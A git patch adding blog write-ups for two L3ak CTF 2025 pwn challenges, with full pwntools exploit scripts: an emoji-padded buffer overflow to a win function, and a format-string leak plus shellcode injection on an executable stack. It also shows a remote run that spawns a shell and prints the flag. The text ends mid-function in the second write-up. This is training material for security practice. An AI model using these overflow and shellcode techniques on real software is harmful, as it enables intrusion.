From 7df580044e1fa54a31c6fe6fb92e0fc59c4f0762 Mon Sep 17 00:00:00 2001
From: furtest <paul.retourne@orange.fr>
Date: Mon, 14 Jul 2025 09:27:19 +0200
Subject: [PATCH] Adds l3ak ctf 2025

---
 content/writeups/2025/l3ak_ctf/_index.md      |   7 +
 .../2025/l3ak_ctf/pwn/safe_gets/chall.zip     | Bin 0 -> 3835 bytes
 .../2025/l3ak_ctf/pwn/safe_gets/exploit.py    |  53 ++++++
 .../2025/l3ak_ctf/pwn/safe_gets/index.md      | 103 +++++++++++
 .../2025/l3ak_ctf/pwn/the_goose/chall.zip     | Bin 0 -> 3943 bytes
 .../2025/l3ak_ctf/pwn/the_goose/exploit.py    |  62 +++++++
 .../2025/l3ak_ctf/pwn/the_goose/index.md      | 168 ++++++++++++++++++
 .../2025/l3ak_ctf/pwn/the_goose/predict.c     |  10 ++
 8 files changed, 403 insertions(+)
 create mode 100644 content/writeups/2025/l3ak_ctf/_index.md
 create mode 100644 content/writeups/2025/l3ak_ctf/pwn/safe_gets/chall.zip
 create mode 100755 content/writeups/2025/l3ak_ctf/pwn/safe_gets/exploit.py
 create mode 100644 content/writeups/2025/l3ak_ctf/pwn/safe_gets/index.md
 create mode 100644 content/writeups/2025/l3ak_ctf/pwn/the_goose/chall.zip
 create mode 100755 content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py
 create mode 100644 content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md
 create mode 100644 content/writeups/2025/l3ak_ctf/pwn/the_goose/predict.c

diff --git a/content/writeups/2025/l3ak_ctf/_index.md b/content/writeups/2025/l3ak_ctf/_index.md
new file mode 100644
index 0000000..57e6ddd
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/_index.md
@@ -0,0 +1,7 @@
++++
+date = '2025-07-14T09:11:19+02:00'
+draft = false 
+title = 'L3ak ctf'
++++
+
+A ctf that seems to be fairly big, I didn't spend much time on it so only solved 2 rather easy pwn challenges.
diff --git a/content/writeups/2025/l3ak_ctf/pwn/safe_gets/chall.zip b/content/writeups/2025/l3ak_ctf/pwn/safe_gets/chall.zip
new file mode 100644
index 0000000000000000000000000000000000000000..c7e0276ce6dc7322834d10d3644197f651fbf5d1
GIT binary patch
literal 3835
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
Kz_FU+@brH+atVU~

literal 0
HcmV?d00001

diff --git a/content/writeups/2025/l3ak_ctf/pwn/safe_gets/exploit.py b/content/writeups/2025/l3ak_ctf/pwn/safe_gets/exploit.py
new file mode 100755
index 0000000..0d7e91c
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/safe_gets/exploit.py
@@ -0,0 +1,53 @@
+#!/usr/bin/python3
+from pwn import *
+
+# Allows you to switch between local/GDB/remote from terminal
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        exe = local_exe
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    elif args.SSH:
+        exe = remote_exe
+        s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
+        return s.process([exe] + argv)
+    else:  # Run locally
+        exe = local_exe
+        return process([exe] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+break main
+break *main+202
+'''.format(**locals())
+
+
+# USE ./filename otherwise gdb will not work
+local_exe = './chall'
+remote_exe = 'REMOTE'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(local_exe, checksec=False)
+# Change logging level to help with debugging (error/warning/info/debug)
+#context.log_level = 'debug'
+context.log_level = 'info'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+io = start()
+
+payload = flat(
+        b"A"*74,
+        b"\x00",
+        "😄".encode("utf-8")*50,
+        b"A"*5,
+        pack((elf.symbols.win)+5)
+        )
+write("payload", payload)
+io.sendlineafter(b"Enter your input (max 255 bytes): ", payload)
+
+# Receive the flag
+io.interactive()
diff --git a/content/writeups/2025/l3ak_ctf/pwn/safe_gets/index.md b/content/writeups/2025/l3ak_ctf/pwn/safe_gets/index.md
new file mode 100644
index 0000000..ad9fa6b
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/safe_gets/index.md
@@ -0,0 +1,103 @@
++++
+date = '2025-07-14T09:16:19+02:00'
+draft = false 
+title = 'Safe Gets'
+tags = [ "pwn" ]
++++
+
+description: I think I found a way to make gets safe.
+Author: White
+
+We are given a program and a python wrapper around it.  
+
+## Main program
+
+Let's start with the program after a quick pass through ghidra
+```C
+int main(void)
+{
+  size_t input_len;
+  char buffer [259];
+  char local_15;
+  int input_len_2;
+  ulong i;
+  
+  gets(buffer);
+  input_len = strlen(buffer);
+  input_len_2 = (int)input_len;
+  for (i = 0; i < (ulong)(long)(input_len_2 / 2); i = i + 1) {
+    local_15 = buffer[(long)(input_len_2 + -1) - i];
+    buffer[(long)(input_len_2 + -1) - i] = buffer[i];
+    buffer[i] = local_15;
+  }
+  puts("Reversed string:");
+  puts(buffer);
+  return 0;
+}
+
+void win(void)
+{
+  system("/bin/sh");
+  return;
+}
+```
+
+It's a simple compiled C program that reverses a string, the interesting thing is the call to `gets` that allows us to overflow the buffer overwrite the return pointer and jump to the beautiful `win` function.  
+No binary protections are stopping us from doing this except the python wrapper the program is launched from.
+```
+[*] 'l3ak_ctf/pwn/safe_gets/chall'
+    Arch:       amd64-64-little
+    RELRO:      Partial RELRO
+    Stack:      No canary found
+    NX:         NX enabled
+    PIE:        No PIE (0x400000)
+    SHSTK:      Enabled
+    IBT:        Enabled
+    Stripped:   No
+```
+
+## Python wrapper
+
+Most of it doesn't matter for us except this small part that limits the length of the input we provide to 255.
+```python
+BINARY = "./chall"
+MAX_LEN = 0xff
+
+# Get input from user
+payload = input(f"Enter your input (max {MAX_LEN} bytes): ")
+if len(payload) > MAX_LEN:
+    print("[-] Input too long!")
+    sys.exit(1)
+```
+
+Thus the tricky part is to bypass this limit because we need to write at least 275 chars to have a big enough overflow.  
+
+## Solve
+
+So what does the `len` function count ? It counts unicode codepoints which can be multiple bytes long.  
+So I replace the part of my payload responsible for filling up the buffer by 😄 emojis and after solving a stack alignment problem I get a shell and the flag.  
+
+Here is my solve script (the interesting part).
+```python
+io = start()
+payload = flat(
+        b"A"*74,
+        b"\x00",
+        "😄".encode("utf-8")*50,
+        b"A"*5,
+        pack((elf.symbols.win)+5)
+        )
+io.sendlineafter(b"Enter your input (max 255 bytes): ", payload)
+io.interactive()
+```
+And when running it we get the flag.
+```
+>>> ./exploit.py REMOTE 34.45.81.67 16002
+[+] Opening connection to 34.45.81.67 on port 16002: Done
+[*] Switching to interactive mode
+$ cat flag.txt
+L3AK{6375_15_4pp4r3n7ly_n3v3r_54f3}
+[*] Interrupted
+[*] Closed connection to 34.45.81.67 port 16002
+```
+
diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/chall.zip b/content/writeups/2025/l3ak_ctf/pwn/the_goose/chall.zip
new file mode 100644
index 0000000000000000000000000000000000000000..799147230810a6d856bec86094b140f7520434f9
GIT binary patch
literal 3943
zcmaKvcTf}B*2O~yks^q+&_wA)=^#al0!BJW?@j4VY6{2|LHY#=U?8G&5D*Y)8YvQK
z24bNJ5d;!Sh#?UO^>N?3^X7YR=6!Q!?Q{0bo;B-_J!j@;4PszC4*&pI0YdliE*_89
z<-w;N{8VQEK!8cOZ?Jz<z`YQE2YWUEgRyYP-M@4{o*h8P_<$Jz_-Bb`-`;hQk->bH
zzhyCrxivPn7`4NdZa?wWLVg7ETG2voTwc~;!f`@bN$zLVZ+5$1QB-P194G5*b+s$W
z5ny*nX!cpK1cKYj)6vzpHmePV^o#%}2V3_BCcl&z{IQ%hhyb=k?q@JD?cb<M;3l^t
z24mj-`IsmDJU_ttKk~2dmb`ew0RRxL0{~2?`F-zthlKop(TT2*i1RCgFp`lGt5}z~
zjOWOHK6B%nMO7v~URG0$3#<=K2<@@q(Qk%{5plwCyR4BHv#o)4epwy9B{>7NN6GgD
zLDxpS>MtkX@Y1nt`7F5krQ}PUYR0pwAbFW6$U^hz*62%rf*4V3*KezQm$s)zqChtn
zdY<kch57xi_YzOm;;T5|E=n`9Z}Q#O21P49bA2GyzZ(+6E=QM;HEOjSnCjtC+VE(p
zn$O00xh)UQ;s!puU30e%{$fI=Y5H>JVW4mC_iRbIj5VfXlMHxIq?5Wp_4W@HWs>hv
z<W<54Cc&`u#k3+e-5)ExCBD;vY#RponQNJy7GqY+^7(Me*37SRUR3%1w@A0k6#h<6
z2oCVwDTX-sC{C{d6AoNudW*octyfOEwAJbea!F^$1O&%#{8<_?esM-)g{iAILL}Z&
zy)o3VPgL#7&_nc!Z2G6@5ER7gn|Ax|6uVNHN2gvdu?DkgkhqG`y_rlCU&Yig`m98$
z=^(ii&;P+a>0KI4;cfdw2(Lce_vQgh;U^twgo6n}ao0UWF03FITAd56%RNrEdaJp=
z#{#Bu?GdK-39t=2(!Boh^c(u|>ytWilmvHn<lOe2q-$J9d%&!<>Ch{(qe6xA$E&tF
ztucx@A<|(1z{>h7IG=jr-J%!OYLeL@AQ0M6Y_7g8^rj0)h->5HR!dg<XXc;*4POwv
zKK3@~jYQT5yEbO^#xOUVW~Dq-k-VZ?p}bNazvSyz3E4tZif`vzMCOA$?2u}o6WhL(
zevt@D8oAwe$$q_b>fB<2GovrJAFN$X%CWzf)!P&*vfwAcOLp*9nFm?v**yqM;xABD
z&5G1o-z_#k=_j0U+FL{KOzd7clJeH=)U^gBux)!dO1tl0ghMB)l<%)$x~aVG`x0>d
zWh{l3LgHFc(mU}U+-*$;xvyh;U^pWs$SaV+c$ISG+GY3x1cmsC&5d5ecTxS7j(FhE
z-fIvz^Z}^3lUiV%a>o7{Jzwp0rhS-{KbmIi??@&!RCGqaXA59?BGL>O#muy2TBXXm
z(pdJCknSv(6{K74`N^=`C!8IPmsM3UTZSt9tors5kPl1s?;RA<He2@e5>$@7SuVNF
z?lc5?ny-KHL|`=DTor4)T=Oam&L=5ia;#rO#)e$FwM;ynD9yibqQubkG8b=fk~*}Y
zinB??Im8|k`@2^^9;VQ03g<`lA2PPt<$h#^V5Q)g>ITd2`Yq~9@21^*>D#LK%jzcd
zlKf}&ezqE~v?aBWB8U25I%H2>!L}~P!Ugt`Nv_~0FZeSH-?OcZ@dch?G<yZ8nyKj6
zo{={ti@|Z*&Y0G?_gN~Qp*FD!J!1S%7IqPABTfE~t_zg2zZA+Dn95j!8*=KhI&ncO
zd9xIgQyNKSS(D*s(anBs;-b%%yf<}#Roxy45Q$BO80U&)4#uUT%@HDa<8TutpWnjy
zqwOUhHrO@=3e%*w0p@YZ05-9%VzfO&wPbvP_Tf7Jj6!BYm{6x|*c(Z&@8`OJ(++NI
zPZYD=wxExmi!ux}6=n83mi9S%wJpY3C?=$JBN{>lvyADlMAXd4I?UR_vEc#r3hu2I
zRhm)OYoXeWz@k|TRV7f_EtpYsWntKymoQ+?e5K`E6R0des*Z}TQc{(?%+bQ}fY=xn
z-=?HpUHIh*G?ZOd$4i)gt|h8?gsp|{`>mni3X%NXzMXSw!NCt3oCo0MXzFCnaHoZ)
z@qp!KV;VVCDQwLywpqJ&b3u^ac@3h9SKna=CfAj0v0Ng2(kIM74+jB#xn2yfw=R8K
zGT-V}oA_Ne!Vy7|gg;prV=6{G-7+HZZDMnk=WzMtG+8S5UP0b~a0TOI9WS*n1$h&{
zUUcS6KlADR9W}oPFML4)rTCf}$gk-oQn8y|HJZrdZ{G{vqGOw7HWU})`7y!DfJK$!
z>s3h-wCI&Qd<XZ-?GG4dj+z`wQUN~f?=6@6d*KPFiex<MqN80&Oj+efE0A*(tIlG5
zb@-3|>kcNej_x2p^23JuZGk2xB|HO<@oNL8521EP6%Mv<xSTi-Qfm3oW1d&*IOK{b
zlEZQDc6@++*cgX9T$+v`o4a)}yAEbtmP3*}OxBtj_l@hGUQ39m7v>wkZ(Z2Y?Xtew
zp+d(aI?mmz7n-%Yy(sP&{oNO!<@|&o7VO>R{B?PBP(+3^85ryM$<(sx!8s{aQ1|0{
ze;&6S>_;`#(!yoU-mg&(>J86J@9>OUP?V*0FimT>eyC3}yB&N$|0!=Q{M&ErHaSjs
z?`;ML&gB+-^!z+_SolxIBtdNXWT-2)U!=&}WysyOf3wimr5j{h`V9(Uh$O20X+Dhg
z?WW7q7`<&?+J56r_a()7PTZwlw{KoUL{9hIQL_~8SR)4O8l?|c9?87+-!-po4am=y
zBetr{70QJsw733IvJf)$d_?Qw?_0I171|CO%r3S<D)9E$akEr(KTRV@Q)D>8ukJMn
zjt!_8BSq(w+_N$pz8%u0pe}!|uA=UqvB~UoXY9aBTjR<Sg4tem(W)yM5*;w97oU3u
zdR6-ns*&lbwWV!}^Vnn&Wjg*s3yJ04n|rSez|jmfgwKe7Iq}xGmU~2rJA>jf=oMw^
zNTXMk&Qc_@XK{GzEgaahy!w7{X8S-ghK1tE(ghskEHG-2vgkp9!GZU<>dPWAW$dKR
z?4OYffqj^xlhCXq4X{Vb{`p2HeOang3)IKFMKtKyPT1Zd-zJOh4n+H)?U%WsD?f|d
z&hrGi&17P8f8aH0pFY<y(*xyyf2~tiU?dR7kKQd_%fj!3yc!PzE6=rscwa3W2A|B|
zmZBgDf>{(ud>i9|L9-wEf&mpcXOG@(yy2Wea=13U3C7GI1@KAZ)mQcT5;90%g#!+@
z_C9Yg4bk?~Nsyila?UG{qjH|`g+M`k($DxKWZ=D|&J8}PaGyPef&>FkuPBZ-PoLJL
z+{Kdzd&iOaLDRZUANCls-duh6kc<|9rIC@U&~!5I)_CsSm=k|v$k99&@g%XKqN<7(
z&$ZtB>+nXj^Q3`iH|bc+*~TDedgxi0H<HGofBZ&V*L1|Dw!Z;h{LXSh*>7Le5NEbt
zmcn!Y1<gB1Vx_KYBgIZLQ&oI00kLN_?Cy!!p)Hf9nmqHhG@qeS7hSdwP&W_5dxJy~
z;<$q71CsVzi^H0gCRIzA^uh|^d@#J9ihO=}P=#jM-oP_%lX^S^KcZ0k(t|J^7f1YW
z9D!GiWX6^Pv;U>}3U;Ni2e-1$v6@@pO{2DG>3-KhCL*bm2AJ)06xd{qn8(0x<{EsH
zq-Bk{KA)M-GxklLJ;~1$FEAImN1p};KKtp^m&H<i%rhL#tRwrSCznQvHask$p4mXA
z=!C!hU?^m|dGc61n=;9vp!69>_<Rz#PuPG^g;U#cgNeR<hewBIS5Dp?>1jbD9>m#c
zS|hDsTmHnvY(ajC@L*c;${5_DvfibkLdWGA{X?SP?Ci3D(0qEcj;wlG-1OWJLCvo_
zl{591zjpe%bkzHIJTER;H(SpUebf`+!3Dnc-dcSW+ikB$baJm9$J%xaVJdCi0g>i%
z@j9Z8`xm8{!y3LRd-B>y20JeC0_0I$v9!{mL~G5)P#eiJZF2HclCQn*e}25u@U_~Z
zLBpi<>*|X99aDSotc35z1p|ULUOQ2|JhC>r%x14OnvI(Ehx7$~i$#tmw7RKrB`>!n
z9f~Gls-PRTZ2vHij~Uz8q(fIR6l!MyU~G-x(OJ7}_L@z1>88uW#HD40N75G)6q(to
ze#%&QSQ;Yk%mp}142V#z)AP~~Zkx^%%sFET#t~_vOD~p_EC-Sj2ZaGvbcI)Dd1J@g
zz3$7*xyzacGi^B)O2@MWO}*s2RAXTZpZhG>HK1}WW^^s8&PDa6im1lY?bqNNz5<y0
zKA^j?^uy#PHG9J@Uz^bj^Q|1J#B=s7&WW}IIgMZPV<Il(T~Qh#N}UHn<iQ1tMT!My
z-!)24D_9M_w8=19i>YDtNE2!=JZG$R@#P;wDU(JjZV|GbTH9_LQ^xTk+2L&9x9f2W
z`F7Xy!cAj{BV;I^sFl(DC5W*%{u7C_&r{cTM&<`?ALRCkwy4>U_iVYa8h;FaPXkut
zF)TjELeDYGKnzk$3pb#Xg=|=if0v_~w;Lh?6J10Yz#@1KP9#jG_JNqGT?7TkT@JJU
zF~<#w{rDS}0iUWkq(#qW-$h30!l0+qsPrTB+=*nGXP@7(?w~ddD(5Y5?nE~VX=vhD
zhFrloBL>N^JMTdf$_6rfndq2Zw!OYQc;=CV+^<yn@@8Kx*p2w>ywIIV2|CPFE+Uur
z@WT%3aqko={(49C^oDZ64QhAt?lsK~#}iljcQx2iX;xm3O$<sru_-goZVMQyg+fiA
z45XK*{)|8FjoA?*BgIM1Z@(wpg<8(uKkA7D17R6=546jX?7-S;1P*q%eq!{Vf`9Iv
zW_8E{Hh-Uq$Ixx8CQ#0k5x@2dyMKWp!eww2)I3k#>1at(6OFk*P0`iGS*D1liTUtu
z1(-~smyUdaBPX1fx{J4uj3UU#u8XP4?nbn;bmB`V9M&K@dQpb|#jOIT^a=pbovJeB
zuh;*jSf+nb?0*sLfBXF>NB+z2FDGKk`_uY2RsJt4rc*8k0O(K8)6=_y^RMn7x&DiV

literal 0
HcmV?d00001

diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py b/content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py
new file mode 100755
index 0000000..85debf3
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/the_goose/exploit.py
@@ -0,0 +1,62 @@
+#!/usr/bin/python3
+from pwn import *
+import subprocess
+
+# Allows you to switch between local/GDB/remote from terminal
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        exe = local_exe
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    elif args.SSH:
+        exe = remote_exe
+        s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
+        return s.process([exe] + argv)
+    else:  # Run locally
+        exe = local_exe
+        return process([exe] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+break *highscore+276
+'''.format(**locals())
+
+
+# USE ./filename otherwise gdb will not work
+local_exe = './chall'
+remote_exe = 'REMOTE'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(local_exe, checksec=False)
+# Change logging level to help with debugging (error/warning/info/debug)
+#context.log_level = 'debug'
+context.log_level = 'info'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+io = start()
+
+number = subprocess.run(["./predict"], capture_output=True).stdout
+io.sendlineafter(b"> ", b"GOD")
+io.sendlineafter(b'so GOD. how many honks?', number)
+
+io.sendlineafter(b"what's your name again?", b'%p')
+
+stack = int(io.recv().decode().split()[1], 16)
+stack -= 0x126 # Offset to our buffer
+
+# Space before return pointer 376
+sh = asm(shellcraft.amd64.linux.sh())
+
+payload = flat(
+        asm('nop')*100,
+        sh,
+        b'A'*(376-100-len(sh)),
+        pack(stack)
+        )
+io.sendline(payload)
+
+io.interactive()
diff --git a/content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md b/content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md
new file mode 100644
index 0000000..e48a703
--- /dev/null
+++ b/content/writeups/2025/l3ak_ctf/pwn/the_goose/index.md
@@ -0,0 +1,168 @@
++++
+date = '2025-07-14T09:16:28+02:00'
+draft = false 
+title = 'The goose'
+tags = [ "pwn" ]
++++
+
+description: When the honking gets tough, you better brush up on your basics.
+Author: dsp
+
+For this challenge we are given the binary and the Dockerfile 
+```
+>>> pwn checksec --file=chall                                                                                   <<<
+[*] 'l3ak_ctf/pwn/the_goose/chall'
+    Arch:       amd64-64-little
+    RELRO:      Partial RELRO
+    Stack:      No canary found
+    NX:         NX unknown - GNU_STACK missing
+    PIE:        PIE enabled
+    Stack:      Executable
+    RWX:        Has RWX segments
+    Stripped:   No
+```
+
+No stack canary and executable stack we can already guess this will involve a shellcode.  
+
+## Exploration 
+
+```
+>>> the_goose ./chall
+Welcome to the goose game.
+Here you have to guess a-priori, how many HONKS you will receive from a very angry goose.
+Godspeed.
+How shall we call you?
+> GOD
+
+so GOD. how many honks?10
+
+ HONK ... HONK
+tough luck. THE GOOSE WINS! GET THE HONK OUT!
+```
+
+So it seems like we have to guess the number of HONKs from the goose.  
+Let's fire up ghidra and look at what we facing.
+
+```C
+int main(void)
+{
+  int iVar1;
+  time_t tVar2;
+  
+  setvbuf(stdout,(char *)0x0,2,0);
+  tVar2 = time((time_t *)0x0);
+  srand((uint)tVar2);
+  setuser();
+  iVar1 = rand();
+  nhonks = iVar1 % 0x5b + 10;
+  iVar1 = guess();
+  if (iVar1 == 0) {
+    puts("tough luck. THE GOOSE WINS! GET THE HONK OUT!");
+  }
+  else {
+    highscore();
+  }
+  return 0;
+}
+```
+
+The number of honks are generated by `rand()` which is seeded with the current time.  
+If we correctly guess the number of honks we go inside of the highscore function.
+```C
+void highscore(void)
+{
+  undefined message_buffer [128];
+  char buffer_random [31];
+  undefined local_d9;
+  undefined name_buffer [32];
+  char success_message [74];
+ 
